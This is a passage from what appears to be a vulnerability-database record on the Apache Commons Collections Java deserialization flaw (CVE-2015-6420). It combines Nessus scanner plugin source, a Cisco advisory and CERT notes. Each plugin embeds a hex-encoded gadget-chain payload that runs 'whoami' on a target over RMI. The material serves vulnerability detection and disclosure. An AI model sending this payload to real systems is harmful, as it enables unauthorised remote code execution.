7\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7e\\x00\\x09\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7e\\x00\\x3f\\x78\\x71\\x00\\x7e\\x00\\x3f';\n\nsend(socket:soc, data:request);\nres = recv(socket:soc, length:0x1000, min:0x800);\nclose(soc);\n\nif (isnull(res) || \"Integer cannot be cast to java.util.Set\" >!< res)\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-17T18:17:29", "bulletinFamily": "scanner", "description": "The version of Cisco Security Manager running on the remote web server\nis affected by a remote code execution vulnerability due to unsafe\ndeserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. An unauthenticated, remote attacker\ncan exploit this, by sending a crafted RMI request, to execute\narbitrary code on the target host", "modified": "2019-11-02T00:00:00", "id": "CISCO_SECURITY_JAVA_DESER.NASL", "href": "https://www.tenable.com/plugins/nessus/99935", "published": "2017-05-02T00:00:00", "title": "Cisco Security Manager Java Object Deserialization RCE (CSCux34671)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99935);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2015-6420\");\n script_bugtraq_id(78872);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCux34671\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Cisco Security Manager Java Object Deserialization RCE (CSCux34671)\");\n script_summary(english:\"Sends an unexpected Java object to the server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco Security Manager running on the remote web server\nis affected by a remote code execution vulnerability due to unsafe\ndeserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. An unauthenticated, remote attacker\ncan exploit this, by sending a crafted RMI request, to execute\narbitrary code on the target host\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCux34671\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCux34671.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:security_manager\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_security_manager_http_detect.nbin\", \"rmiregistry_detect.nasl\");\n script_require_keys(\"installed_sw/Cisco Security Manager\");\n script_require_ports(\"Services/rmi_registry\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"rmi.inc\");\n\nappname = \"Cisco Security Manager\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_service(svc:\"rmi_registry\", ipproto:\"tcp\", exit_on_fail:TRUE);\n\n# grab information about CSM that we can report to the customer\nhttp_port = get_http_port(default:443);\ninstall = get_single_install(app_name:appname, port:http_port);\n\n# connect to the rmi port\nsoc = rmi_connect(port:port);\n\n# Due to the nature of this exploit, we can't see the result of the\n# commands we execute. However, successful execution of our command\n# will always result in a specific exception being sent back to us.\n# This object (CommonCollections1) executes 'whoami' and we look\n# for the exception that indicates successful deserialization\nrequest = '\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x00\\x00\\x00\\x50\\xac\\xed\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4d\\xc9\\xd4\\xe6\\x3b\\xdf\\x74\\x00\\x14\\x70\\x77\\x6e\\x65\\x64\\x32\\x39\\x33\\x38\\x34\\x38\\x31\\x36\\x30\\x37\\x31\\x38\\x39\\x38\\x32\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0f\\x6a\\x61\\x76\\x61\\x2e\\x72\\x6d\\x69\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x70\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x0c\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x00\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x70\\x78\\x71\\x00\\x7e\\x00\\x02\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x70\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x24\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x21\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x06\\x77\\x68\\x6f\\x61\\x6d\\x69\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x17\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7e\\x00\\x09\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7e\\x00\\x3f\\x78\\x71\\x00\\x7e\\x00\\x3f';\n\nsend(socket:soc, data:request);\nres = recv(socket:soc, length:0x1000, min:0x800);\nclose(soc);\n\nif (isnull(res) || \"Integer cannot be cast to java.util.Set\" >!< res)\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname, install[\"version\"]);\n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2019-10-14T21:30:12", "bulletinFamily": "software", "description": "A vulnerability in the Java deserialization used by the Apache Commons Collections (ACC) library could allow an unauthenticated, remote attacker to execute arbitrary code.\n\nThe vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by submitting crafted input to an application on a targeted system that uses the ACC library. After the vulnerable library on the affected system deserializes the content, the attacker could execute arbitrary code on the system, which could be used to conduct further attacks.\n\nOn November 6, 2015, Foxglove Security Group published information about a remote code execution vulnerability that affects multiple releases of the ACC library. The report contains detailed proof-of-concept code for a number of applications, including WebSphere Application Server, JBoss, Jenkins, OpenNMS, and WebLogic. This is a remotely exploitable vulnerability that allows an attacker to inject any malicious code or execute any commands that exist on the server. A wide range of potential impacts includes allowing the attacker to obtain sensitive information.\n\nObject serialization is a technique that many programming languages use to convert an object into a sequence of bits for transfer purposes. Deserialization is a technique that reassembles those bits back to an object. This vulnerability occurs in Java object serialization for network transport and object deserialization on the receiving side.\n\nMany applications accept serialized objects from the network without performing input validation checks before deserializing it. Crafted serialized objects can therefore lead to execution of arbitrary attacker code.\n\nAlthough the problem itself is in the serialization and deserialization functionality of the Java programming language, the ACC library is known to be affected by this vulnerability. Any application or application framework could be vulnerable if it uses the ACC library and deserializes arbitrary, user-supplied Java serialized data.\n\nAdditional details about the vulnerability are available at the following links:\n\n Official Vulnerability Note from CERT [\"http://www.kb.cert.org/vuls/id/576313\"]\nFoxglove Security [\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\"]\nApache Commons Statement [\"https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread\"]\nOracle Security Alert [\"https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852\"]\n\n Cisco will release software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization\"]", "modified": "2019-01-07T19:53:07", "published": "2015-12-09T16:00:00", "id": "CISCO-SA-20151209-JAVA-DESERIALIZATION", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization", "type": "cisco", "title": "Vulnerability in Java Deserialization Affecting Cisco Products", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2019-10-09T19:49:13", "bulletinFamily": "info", "description": "### Overview \n\nThe TP-LINK EAP Controller is TP-LINK's software for remotely controlling wireless access point devices. EAP Controller for Linux lacks user authentication for RMI service commands, as well as utilizes an outdated vulnerable version of Apache commons-collections, which may allow an attacker to implement deserialization attacks and control the EAP Controller server.\n\n### Description \n\n[](<http://cwe.mitre.org/data/definitions/306.html>)\n\n[**CWE-306**](<http://cwe.mitre.org/data/definitions/306.html>)**: Missing Authentication for Critical Function - **CVE-2018-5393 \n \nEAP Controller for Linux utilizes a Java remote method invocation (RMI) service for remote control. The RMI interface does not require any authentication before use. Remote attackers can implement deserialization attacks through the RMI protocol. Successful attacks may allow a remote attacker to remotely control the target server and execute Java functions or bytecode. \n \n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data - **CVE-2015-6420 \n \nEAP Controller for Linux bundles a vulnerable version of Apache commons-collections v3.2.1 with the software, which appears to be the root cause of the vulnerability. Therefore, EAP Controller v2.5.3 and earlier are vulnerable to CVE-2015-6420 as documented in [VU#576313](<https://www.kb.cert.org/vuls/id/576313>). \n \nEAP Controller v2.5.3 and earlier for Linux are affected by both vulnerabilities. \n \n--- \n \n### Impact \n\nA Java application or library with the Apache Commons Collections library in its classpath may be coerced into executing arbitrary Java functions or bytecode. \n \n--- \n \n### Solution \n\nThe Omada Controller software v3.0.2 and later are not affected by this issue. Software download is available on the TP-Link [support ](<https://www.tp-link.com/en/support.html>)website. If older software must be used, users can help mitigate and reduce risk by updating the vulnerable libraries does not necessarily eliminate the vulnerability in all scenarios, as described in As described in [VU#576313](<https://www.kb.cert.org/vuls/id/576313>). \n \n--- \n \n**Update Apache commons-collections** \n \nAffected users should update the system Apache commons-collections library to at least version 3.2.2 or 4.1. For details, please see [VU#576313](<https://www.kb.cert.org/vuls/id/576313>). \n \n**Update the JRE version of EAP** \n \nAffected users should also update the Java Runtime Environment (JRE) used by EAP to the latest available version. Recent versions of JRE have improved deserialization protection features. \n \n--- \n \n### Vendor Information\n\n581311\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ TP-LINK\n\nNotified: July 03, 2018 Updated: October 16, 2018 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 5.9 | E:POC/RL:OF/RC:C \nEnvironmental | 5.9 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.kb.cert.org/vuls/id/576313>\n * <https://www.tp-link.com/en/download/EAP220.html#Controller_Software>\n * <https://docs.oracle.com/javase/8/docs/technotes/guides/rmi/rmi_security_recommendations.html>\n * <http://cwe.mitre.org/data/definitions/306.html>\n * <http://cwe.mitre.org/data/definitions/502.html>\n\n### Acknowledgements\n\nThanks to Liu Zhu, of Huawei Weiran Lab for reporting this vulnerability.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2018-5393, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5393>) [CVE-2015-6420](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6420>) \n---|--- \n**Date Public:** | 2018-09-18 \n**Date First Published:** | 2018-09-26 \n**Date Last Updated: ** | 2018-11-08 18:58 UTC \n**Document Revision: ** | 102 \n", "modified": "2018-11-08T18:58:00", "published": "2018-09-26T00:00:00", "id": "VU:581311", "href": "https://www.kb.cert.org/vuls/id/581311", "type": "cert", "title": "TP-Link EAP Controller lacks RMI authentication and is vulnerable to deserialization attacks", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T19:48:59", "bulletinFamily": "info", "description": "### Overview \n\nThe Apache Commons Collections (ACC) library is vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Java applications that either directly use ACC, or contain ACC in their classpath, may be vulnerable to arbitrary code execution.\n\n### Description \n\n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data - **CVE-2015-6420\n\nIn January 2015, at AppSec California 2015, researchers [Gabriel Lawrence and Chris Frohoff](<http://frohoff.github.io/appseccali-marshalling-pickles/>) described how many Java applications and libraries using Java Object Serialization may be vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Any Java library or application that utilizes this functionality incorrectly may be impacted by this vulnerability. \n \nIn November 2015, [Stephen Breen of Foxglove Security](<http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>) identified the [Apache Commons Collections](<https://commons.apache.org/proper/commons-collections/>) (ACC) Java library as being vulnerable to insecure deserialization of data; specifically, the ACC `InvokerTransformer` class may allow arbitrary code execution when used to deserialize data from untrusted sources. According to the researcher, this issue affects several large projects that utilize ACC including WebSphere, JBoss, [Jenkins](<https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>), [WebLogic](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179>), and OpenNMS. Unify also reports that [OpenScape](<https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>) software is affected. In addition, [Cisco](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20>) has released an advisory for their products. \n \nBoth [versions 3.2.1 and 4.0](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) of the Apache Commons Collections library have been identified as being vulnerable to this deserialization issue. \n \nThe Apache Software Foundation has released a [statement](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) regarding this issue, which contains advice for mitigating the issue, as well as further references and links. A [bug](<https://issues.apache.org/jira/browse/COLLECTIONS-580>) tracker entry has been filed to track progress toward a full solution. \n \nOther libraries, such as Groovy and Spring, are currently being investigated for similar flaws. Lawrence and Frohoff's presentation describes how applications and libraries written in other languages, such as Python and Ruby, may also be vulnerable to the same type of issue. It is generally up to software designers to follow best practices for security when handling serialized data, no matter the programming language or library used. \n \n--- \n \n### Impact \n\nA Java application or library with the Apache Commons Collections library in its classpath may be coerced into executing arbitrary Java functions or bytecode. \n \nWhile many applications do not actively use serialization or deserailization, they often rely on libraries that do. If a class uses deserialization on some input stream (either a file or socket), and an attacker can send malicious data down that stream, the attacker can cause the program to construct objects of any class on its classpath (whether it uses those classes or not). And some classes, such as those in the ACC automatically execute code based on attacker-supplied deserialization input. \n \nAn application that neither uses deserialization, nor employs any libraries that use deserialization, would not be vulnerable to this problem. Such an application should also lack a plugin architecture, or any mechanism for loading code that might use deserialization. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of a full solution to this problem, but you may consider the following: \n 